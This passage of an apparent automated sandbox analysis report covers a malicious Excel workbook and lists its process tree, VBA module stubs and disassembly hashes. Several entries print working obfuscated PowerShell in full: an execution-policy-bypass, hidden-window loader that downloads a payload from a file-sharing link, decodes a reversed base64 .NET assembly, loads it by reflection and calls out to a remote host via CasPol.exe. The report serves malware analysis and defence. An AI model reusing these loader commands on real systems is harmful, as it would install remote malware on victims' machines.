                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:19
                                                                                                    Start time:05:12:53
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe
                                                                                                    Imagebase:0x13fe50000
                                                                                                    File size:443'392 bytes
                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:21
                                                                                                    Start time:05:12:56
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.cmdline"
                                                                                                    Imagebase:0x13f2f0000
                                                                                                    File size:2'758'280 bytes
                                                                                                    MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:22
                                                                                                    Start time:05:12:56
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2BF1.tmp" "c:\Users\user\AppData\Local\Temp\vbdaauwq\CSC29236E271A724343A6FBC96F9241CBFB.TMP"
                                                                                                    Imagebase:0x13f910000
                                                                                                    File size:52'744 bytes
                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:24
                                                                                                    Start time:05:13:00
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingswithgoodthingsforgetmeback.vbS"
                                                                                                    Imagebase:0xff3b0000
                                                                                                    File size:168'960 bytes
                                                                                                    MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:25
                                                                                                    Start time:05:13:00
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                    Imagebase:0x13fe50000
                                                                                                    File size:443'392 bytes
                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:27
                                                                                                    Start time:05:13:01
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"
                                                                                                    Imagebase:0x13fe50000
                                                                                                    File size:443'392 bytes
                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:30
                                                                                                    Start time:05:13:25
                                                                                                    Start date:29/10/2024
                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                    Imagebase:0x11e0000
                                                                                                    File size:107'704 bytes
                                                                                                    MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Disassembly

                                                                                                    Code Analysis

                                                                                                    Call Graph

                                                                                                    • Entrypoint
                                                                                                    • Decryption Function
                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    • Show Help
                                                                                                    callgraph 1 Error: Graph is empty

                                                                                                    Module: Sheet1

                                                                                                    Declaration
                                                                                                    LineContent
                                                                                                    1

                                                                                                    Attribute VB_Name = "Sheet1"

                                                                                                    2

                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                    3

                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                    4

                                                                                                    Attribute VB_Creatable = False

                                                                                                    5

                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                    6

                                                                                                    Attribute VB_Exposed = True

                                                                                                    7

                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                    8

                                                                                                    Attribute VB_Customizable = True

                                                                                                    Module: Sheet2

                                                                                                    Declaration
                                                                                                    LineContent
                                                                                                    1

                                                                                                    Attribute VB_Name = "Sheet2"

                                                                                                    2

                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                    3

                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                    4

                                                                                                    Attribute VB_Creatable = False

                                                                                                    5

                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                    6

                                                                                                    Attribute VB_Exposed = True

                                                                                                    7

                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                    8

                                                                                                    Attribute VB_Customizable = True

                                                                                                    Module: Sheet3

                                                                                                    Declaration
                                                                                                    LineContent
                                                                                                    1

                                                                                                    Attribute VB_Name = "Sheet3"

                                                                                                    2

                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                    3

                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                    4

                                                                                                    Attribute VB_Creatable = False

                                                                                                    5

                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                    6

                                                                                                    Attribute VB_Exposed = True

                                                                                                    7

                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                    8

                                                                                                    Attribute VB_Customizable = True

                                                                                                    Module: ThisWorkbook

                                                                                                    Declaration
                                                                                                    LineContent
                                                                                                    1

                                                                                                    Attribute VB_Name = "ThisWorkbook"

                                                                                                    2

                                                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                    3

                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                    4

                                                                                                    Attribute VB_Creatable = False

                                                                                                    5

                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                    6

                                                                                                    Attribute VB_Exposed = True

                                                                                                    7

                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                    8

                                                                                                    Attribute VB_Customizable = True

                                                                                                    Reset < >

                                                                                                      Executed Functions

                                                                                                      Function 03630FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000003.423258881.0000000003630000.00000010.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_3_3630000_mshta.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                      • Instruction ID: 06c690f1cd09f95710720878cb6fcfe65babc4471f3deb96832c576e1aa42b6e
                                                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      Function 03630FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000003.423258881.0000000003630000.00000010.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_3_3630000_mshta.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                      • Instruction ID: 06c690f1cd09f95710720878cb6fcfe65babc4471f3deb96832c576e1aa42b6e
                                                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      Function 03630FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000003.423258881.0000000003630000.00000010.00000800.00020000.00000000.sdmp, Offset: 03630000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_3_3630000_mshta.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                      • Instruction ID: 06c690f1cd09f95710720878cb6fcfe65babc4471f3deb96832c576e1aa42b6e
                                                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                      • Instruction Fuzzy Hash:

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:4.7%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:50%
                                                                                                      Total number of Nodes:6
                                                                                                      Total number of Limit Nodes:0
                                                                                                      execution_graph 2387 7fe899d4ab5 2389 7fe899d4ac1 URLDownloadToFileW 2387->2389 2390 7fe899d5b10 2389->2390 2379 7fe899d59f1 2380 7fe899d5a01 URLDownloadToFileW 2379->2380 2382 7fe899d5b10 2380->2382

                                                                                                      Executed Functions

                                                                                                      Function 000007FE899D4AB5 Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.451964100.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7fe899d0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8d1e91dceca0bf4a9c032d596fa650b28b3638403fcf67430fd87d17deced457
                                                                                                      • Instruction ID: 44d3998f1a1043b06957a7bf78badacb67c87460fd060b9075fc0ef1beb481b5
                                                                                                      • Opcode Fuzzy Hash: 8d1e91dceca0bf4a9c032d596fa650b28b3638403fcf67430fd87d17deced457
                                                                                                      • Instruction Fuzzy Hash: E151263190CB984FD716DB589C456E97FF0FB56320F0442AFD089D71A3CA686806C792
                                                                                                      Function 000007FE899D59F1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.451964100.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7fe899d0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DownloadFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 1407266417-0
                                                                                                      • Opcode ID: 687041d381776ff91d67ea2cc655d11f462eef6b51ef3bdd1838ccf531e88737
                                                                                                      • Instruction ID: 12c0e95903fbaf63b5ccd2c230ba1c2dd23ed54b55ce1596b740c8660b335a9d
                                                                                                      • Opcode Fuzzy Hash: 687041d381776ff91d67ea2cc655d11f462eef6b51ef3bdd1838ccf531e88737
                                                                                                      • Instruction Fuzzy Hash: B241F57081DB989FDB5ADB589C847B9BBF4FB56321F04826FD08DD7162CB246806C782
                                                                                                      Function 000007FE899D4AFC Relevance: 1.6, APIs: 1, Instructions: 143filenetworkCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.451964100.000007FE899D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899D0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7fe899d0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DownloadFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 1407266417-0
                                                                                                      • Opcode ID: 0860e0ee48068c2351229ddc6eda08e44decfaaf15270d48a634b6fab0291891
                                                                                                      • Instruction ID: 1b88a5baf257c191238018ebd54a7b410e4c46d34a3b7c4e9f87bbadd85e2f8f
                                                                                                      • Opcode Fuzzy Hash: 0860e0ee48068c2351229ddc6eda08e44decfaaf15270d48a634b6fab0291891
                                                                                                      • Instruction Fuzzy Hash: 5841D13190CB9C4FDB19DF5898856A9BBF0FB59320F04826FD04DD3262DB74A805CB92
                                                                                                      Function 000007FE89AA26E9 Relevance: .7, Instructions: 709COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 39 7fe89aa26e9-7fe89aa2799 40 7fe89aa2c7d-7fe89aa2d36 39->40 41 7fe89aa279f-7fe89aa27a9 39->41 42 7fe89aa27ab-7fe89aa27b8 41->42 43 7fe89aa27c2-7fe89aa27c9 41->43 42->43 47 7fe89aa27ba-7fe89aa27c0 42->47 44 7fe89aa27cb-7fe89aa27de 43->44 45 7fe89aa27e0 43->45 48 7fe89aa27e2-7fe89aa27e4 44->48 45->48 47->43 50 7fe89aa2bf8-7fe89aa2c02 48->50 51 7fe89aa27ea-7fe89aa27f6 48->51 53 7fe89aa2c15-7fe89aa2c25 50->53 54 7fe89aa2c04-7fe89aa2c14 50->54 51->40 55 7fe89aa27fc-7fe89aa2806 51->55 56 7fe89aa2c27-7fe89aa2c2b 53->56 57 7fe89aa2c32-7fe89aa2c7c 53->57 58 7fe89aa2808-7fe89aa2815 55->58 59 7fe89aa2822-7fe89aa2832 55->59 56->57 58->59 61 7fe89aa2817-7fe89aa2820 58->61 59->50 66 7fe89aa2838-7fe89aa286c 59->66 61->59 66->50 71 7fe89aa2872-7fe89aa287e 66->71 71->40 72 7fe89aa2884-7fe89aa288e 71->72 73 7fe89aa28a7-7fe89aa28ac 72->73 74 7fe89aa2890-7fe89aa289d 72->74 73->50 76 7fe89aa28b2-7fe89aa28b7 73->76 74->73 75 7fe89aa289f-7fe89aa28a5 74->75 75->73 76->50 77 7fe89aa28bd-7fe89aa28c2 76->77 77->50 79 7fe89aa28c8-7fe89aa28d7 77->79 80 7fe89aa28d9-7fe89aa28e3 79->80 81 7fe89aa28e7 79->81 82 7fe89aa28e5 80->82 83 7fe89aa2903-7fe89aa298e 80->83 84 7fe89aa28ec-7fe89aa28f9 81->84 82->84 91 7fe89aa2990-7fe89aa299b 83->91 92 7fe89aa29a2-7fe89aa29c4 83->92 84->83 85 7fe89aa28fb-7fe89aa2901 84->85 85->83 91->92 93 7fe89aa29c6-7fe89aa29d0 92->93 94 7fe89aa29d4 92->94 95 7fe89aa29f0-7fe89aa2a7e 93->95 96 7fe89aa29d2 93->96 97 7fe89aa29d9-7fe89aa29e6 94->97 104 7fe89aa2a80-7fe89aa2a8b 95->104 105 7fe89aa2a92-7fe89aa2ab0 95->105 96->97 97->95 98 7fe89aa29e8-7fe89aa29ee 97->98 98->95 104->105 106 7fe89aa2ac0 105->106 107 7fe89aa2ab2-7fe89aa2abc 105->107 110 7fe89aa2ac5-7fe89aa2ad3 106->110 108 7fe89aa2add-7fe89aa2b6d 107->108 109 7fe89aa2abe 107->109 117 7fe89aa2b81-7fe89aa2bda 108->117 118 7fe89aa2b6f-7fe89aa2b7a 108->118 109->110 110->108 111 7fe89aa2ad5-7fe89aa2adb 110->111 111->108 121 7fe89aa2be2-7fe89aa2bf7 117->121 118->117
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.452079637.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7fe89aa0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 93fc0e055492b7d44257e852a2dcaa89768b95193b56798fd71f32a013e5bbc8
                                                                                                      • Instruction ID: 1b48ec3f0016ed9f56b55937d4b2faf711ee2af06f39cf8531cbf02fcef9068c
                                                                                                      • Opcode Fuzzy Hash: 93fc0e055492b7d44257e852a2dcaa89768b95193b56798fd71f32a013e5bbc8
                                                                                                      • Instruction Fuzzy Hash: 4D22E53090CB894FE75ADB2C84546697FE2FF9A344F2401EED48EC72A3DA25AC65C741
                                                                                                      Function 000007FE89AA0F0D Relevance: .4, Instructions: 351COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 122 7fe89aa0f0d-7fe89aa0f96 124 7fe89aa1098-7fe89aa10dc 122->124 125 7fe89aa0f9c-7fe89aa0fa6 122->125 133 7fe89aa10ed-7fe89aa1124 124->133 134 7fe89aa10de-7fe89aa10e7 124->134 126 7fe89aa0fa8-7fe89aa0fb5 125->126 127 7fe89aa0fbf-7fe89aa0fee 125->127 126->127 129 7fe89aa0fb7-7fe89aa0fbd 126->129 127->124 138 7fe89aa0ff4-7fe89aa0ffe 127->138 129->127 136 7fe89aa112a-7fe89aa119e 133->136 137 7fe89aa11c1-7fe89aa11cb 133->137 134->133 156 7fe89aa11a6-7fe89aa11be 136->156 139 7fe89aa11d8-7fe89aa11e8 137->139 140 7fe89aa11cd-7fe89aa11d7 137->140 141 7fe89aa1017-7fe89aa1077 138->141 142 7fe89aa1000-7fe89aa100d 138->142 143 7fe89aa11ea-7fe89aa11ee 139->143 144 7fe89aa11f5-7fe89aa121a 139->144 153 7fe89aa1079-7fe89aa1084 141->153 154 7fe89aa108b-7fe89aa1097 141->154 142->141 146 7fe89aa100f-7fe89aa1015 142->146 143->144 146->141 153->154 156->137
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.452079637.000007FE89AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7fe89aa0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 773f8a8e802395085005df7b2b494d5a3bdded9eb4932132f57650642448fdeb
                                                                                                      • Instruction ID: b2468541077944264896c1cc16f33182abb1b0ddc8db05bce381e67f45a2bf51
                                                                                                      • Opcode Fuzzy Hash: 773f8a8e802395085005df7b2b494d5a3bdded9eb4932132f57650642448fdeb
                                                                                                      • Instruction Fuzzy Hash: 83A1F221A0DBCA0FE357973C58646657FE1EF47254B2A01EBC48DCB1B3DA189C5AC362

                                                                                                      Executed Functions

                                                                                                      Function 036E0FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000003.464899481.00000000036E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_3_36e0000_mshta.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                      • Instruction ID: 8d46a89be4051d36f0c6dcc725d38e9d4cac1c01e0afc510f0298f0dcb3fa18d
                                                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      Function 036E0FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000003.464899481.00000000036E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_3_36e0000_mshta.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                      • Instruction ID: 8d46a89be4051d36f0c6dcc725d38e9d4cac1c01e0afc510f0298f0dcb3fa18d
                                                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      Function 036E0FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000003.464899481.00000000036E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_3_36e0000_mshta.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                      • Instruction ID: 8d46a89be4051d36f0c6dcc725d38e9d4cac1c01e0afc510f0298f0dcb3fa18d
